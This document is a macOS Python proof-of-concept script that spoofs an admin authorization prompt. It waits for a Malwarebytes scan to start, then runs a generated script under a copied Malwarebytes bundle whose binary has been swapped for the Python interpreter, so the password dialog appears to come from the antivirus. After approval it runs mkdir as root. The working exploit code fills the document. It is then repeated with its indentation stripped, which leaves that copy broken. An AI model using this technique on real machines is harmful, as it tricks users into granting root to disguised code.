nikolay-n/mbam-fake-auth.py

## mbam-fake-auth.py
#!/usr/bin/python2.7
# -*- coding: utf-8 -*-
import os
import sys
import subprocess
import shutil
import time

python_bin = "/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python"
last_bundle_path = subprocess.check_output(['mdfind', "kMDItemCFBundleIdentifier == com.malwarebytes.mbam.frontend.launcher"]).strip("\n")
if not last_bundle_path:
    print("Hmm, no Malwarebytes found!!!")
    sys.exit(-1)

f = subprocess.Popen(['log', 'stream', '--predicate', 'process == "FrontendApplication" && eventMessage CONTAINS[c] "scanInProgress"', '--debug'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
while True:
    line = f.stdout.readline()
    if "inProgress.title.scanInProgress" in line:
        break

print("Malware scan started")

tmp_script = "/tmp/auth.py"

# most of code from https://gist.github.com/pudquick/bc1ad98e7ee0a50fba94
with open(tmp_script, "w") as f:
    f.write('''#!/usr/bin/python2.7
import os
from ctypes import CDLL, Structure, POINTER, c_char_p, c_size_t, c_void_p, c_uint32, pointer, byref
Security = CDLL('/System/Library/Frameworks/Security.framework/Versions/Current/Security')

prompt = ""
mkdir_bin = "/bin/mkdir"
flag_path = os.path.join(os.path.expanduser("~/Desktop"), "DirOwnedByRoot")


class OpaqueType(Structure):
    pass


class AuthorizationItem(Structure):
    _fields_ = [('name', c_char_p),
                ('valueLength', c_size_t),
                ('value', c_char_p),
                ('flags', c_uint32),
               ]


class AuthorizationItemSet(Structure):
    _fields_ = [('count', c_uint32),
                ('items', POINTER(AuthorizationItem)),
               ]


class FILE(Structure):
    pass


OpaqueTypeRef = POINTER(OpaqueType)
AuthorizationRef = OpaqueTypeRef

kSMRightModifySystemDaemons = "com.apple.ServiceManagement.daemons.modify"
kSMRightBlessPrivilegedHelper = "com.apple.ServiceManagement.blesshelper"
kAuthorizationRightExecute = "system.privilege.admin"
kAuthorizationEnvironmentPrompt = "prompt"
kAuthorizationEmptyEnvironment = None

kAuthorizationFlagDefaults = 0
kAuthorizationFlagInteractionAllowed = (1 << 0)
kAuthorizationFlagExtendRights = (1 << 1)
kAuthorizationFlagPartialRights = (1 << 2)
kAuthorizationFlagDestroyRights = (1 << 3)
kAuthorizationFlagPreAuthorize = (1 << 4)

AuthorizationCreate = Security.AuthorizationCreate
AuthorizationCopyRights = Security.AuthorizationCopyRights
AuthorizationExecuteWithPrivileges = Security.AuthorizationExecuteWithPrivileges

authref = AuthorizationRef()
result = AuthorizationCreate(None, kAuthorizationEmptyEnvironment, kAuthorizationFlagDefaults, byref(authref))

multi_right = (AuthorizationItem*3)()
multi_right[0].name = kSMRightModifySystemDaemons
multi_right[1].name = kSMRightBlessPrivilegedHelper
multi_right[2].name = kAuthorizationRightExecute

rights = AuthorizationItemSet()
rights.count = 3
rights.items = pointer(multi_right[0])

env_items = (AuthorizationItem*1)()
env_items[0].name = kAuthorizationEnvironmentPrompt
env_items[0].valueLength = len(prompt)
env_items[0].value = prompt


env = AuthorizationItemSet()
env.count = 1
env.items = pointer(env_items[0])

flags = kAuthorizationFlagDefaults | kAuthorizationFlagPreAuthorize | kAuthorizationFlagExtendRights | kAuthorizationFlagInteractionAllowed

result = AuthorizationCopyRights(authref, byref(rights), byref(env), flags, None)

argv = [flag_path]
argv = (c_char_p * (len(argv) + 1))(*(argv + [None]))
channel = POINTER(FILE)()

if result == 0:
    result = AuthorizationExecuteWithPrivileges(authref, mkdir_bin, kAuthorizationFlagDefaults, argv, byref(channel))

''')

mbam_pid = subprocess.check_output(['pgrep', 'FrontendApplication']).strip("\n")
tmp_bundle_path = "/tmp/Malwarebytes.app"

shutil.copytree(last_bundle_path, tmp_bundle_path)
mbam_bin = os.path.join(tmp_bundle_path, "Contents", "MacOS", "Malwarebytes")
os.unlink(mbam_bin)
shutil.copy(python_bin, mbam_bin)

subprocess.check_call(["kill", "-SIGSTOP", mbam_pid])
subprocess.check_call([mbam_bin, tmp_script])
subprocess.check_call(["kill", "-SIGCONT", mbam_pid])
os.unlink(tmp_script)
shutil.rmtree(tmp_bundle_path)
	#!/usr/bin/python2.7
	# -- coding: utf-8 --
	import os
	import sys
	import subprocess
	import shutil
	import time

	python_bin = "/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python"
	last_bundle_path = subprocess.check_output(['mdfind', "kMDItemCFBundleIdentifier == com.malwarebytes.mbam.frontend.launcher"]).strip("\n")
	if not last_bundle_path:
	print("Hmm, no Malwarebytes found!!!")
	sys.exit(-1)

	f = subprocess.Popen(['log', 'stream', '--predicate', 'process == "FrontendApplication" && eventMessage CONTAINS[c] "scanInProgress"', '--debug'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
	while True:
	line = f.stdout.readline()
	if "inProgress.title.scanInProgress" in line:
	break

	print("Malware scan started")

	tmp_script = "/tmp/auth.py"

	# most of code from https://gist.github.com/pudquick/bc1ad98e7ee0a50fba94
	with open(tmp_script, "w") as f:
	f.write('''#!/usr/bin/python2.7
	import os
	from ctypes import CDLL, Structure, POINTER, c_char_p, c_size_t, c_void_p, c_uint32, pointer, byref
	Security = CDLL('/System/Library/Frameworks/Security.framework/Versions/Current/Security')

	prompt = ""
	mkdir_bin = "/bin/mkdir"
	flag_path = os.path.join(os.path.expanduser("~/Desktop"), "DirOwnedByRoot")


	class OpaqueType(Structure):
	pass


	class AuthorizationItem(Structure):
	_fields_ = [('name', c_char_p),
	('valueLength', c_size_t),
	('value', c_char_p),
	('flags', c_uint32),
	]


	class AuthorizationItemSet(Structure):
	_fields_ = [('count', c_uint32),
	('items', POINTER(AuthorizationItem)),
	]


	class FILE(Structure):
	pass


	OpaqueTypeRef = POINTER(OpaqueType)
	AuthorizationRef = OpaqueTypeRef

	kSMRightModifySystemDaemons = "com.apple.ServiceManagement.daemons.modify"
	kSMRightBlessPrivilegedHelper = "com.apple.ServiceManagement.blesshelper"
	kAuthorizationRightExecute = "system.privilege.admin"
	kAuthorizationEnvironmentPrompt = "prompt"
	kAuthorizationEmptyEnvironment = None

	kAuthorizationFlagDefaults = 0
	kAuthorizationFlagInteractionAllowed = (1 << 0)
	kAuthorizationFlagExtendRights = (1 << 1)
	kAuthorizationFlagPartialRights = (1 << 2)
	kAuthorizationFlagDestroyRights = (1 << 3)
	kAuthorizationFlagPreAuthorize = (1 << 4)

	AuthorizationCreate = Security.AuthorizationCreate
	AuthorizationCopyRights = Security.AuthorizationCopyRights
	AuthorizationExecuteWithPrivileges = Security.AuthorizationExecuteWithPrivileges

	authref = AuthorizationRef()
	result = AuthorizationCreate(None, kAuthorizationEmptyEnvironment, kAuthorizationFlagDefaults, byref(authref))

	multi_right = (AuthorizationItem*3)()
	multi_right[0].name = kSMRightModifySystemDaemons
	multi_right[1].name = kSMRightBlessPrivilegedHelper
	multi_right[2].name = kAuthorizationRightExecute

	rights = AuthorizationItemSet()
	rights.count = 3
	rights.items = pointer(multi_right[0])

	env_items = (AuthorizationItem*1)()
	env_items[0].name = kAuthorizationEnvironmentPrompt
	env_items[0].valueLength = len(prompt)
	env_items[0].value = prompt


	env = AuthorizationItemSet()
	env.count = 1
	env.items = pointer(env_items[0])

	flags = kAuthorizationFlagDefaults \| kAuthorizationFlagPreAuthorize \| kAuthorizationFlagExtendRights \| kAuthorizationFlagInteractionAllowed

	result = AuthorizationCopyRights(authref, byref(rights), byref(env), flags, None)

	argv = [flag_path]
	argv = (c_char_p * (len(argv) + 1))(*(argv + [None]))
	channel = POINTER(FILE)()

	if result == 0:
	result = AuthorizationExecuteWithPrivileges(authref, mkdir_bin, kAuthorizationFlagDefaults, argv, byref(channel))

	''')

	mbam_pid = subprocess.check_output(['pgrep', 'FrontendApplication']).strip("\n")
	tmp_bundle_path = "/tmp/Malwarebytes.app"

	shutil.copytree(last_bundle_path, tmp_bundle_path)
	mbam_bin = os.path.join(tmp_bundle_path, "Contents", "MacOS", "Malwarebytes")
	os.unlink(mbam_bin)
	shutil.copy(python_bin, mbam_bin)

	subprocess.check_call(["kill", "-SIGSTOP", mbam_pid])
	subprocess.check_call([mbam_bin, tmp_script])
	subprocess.check_call(["kill", "-SIGCONT", mbam_pid])
	os.unlink(tmp_script)
	shutil.rmtree(tmp_bundle_path)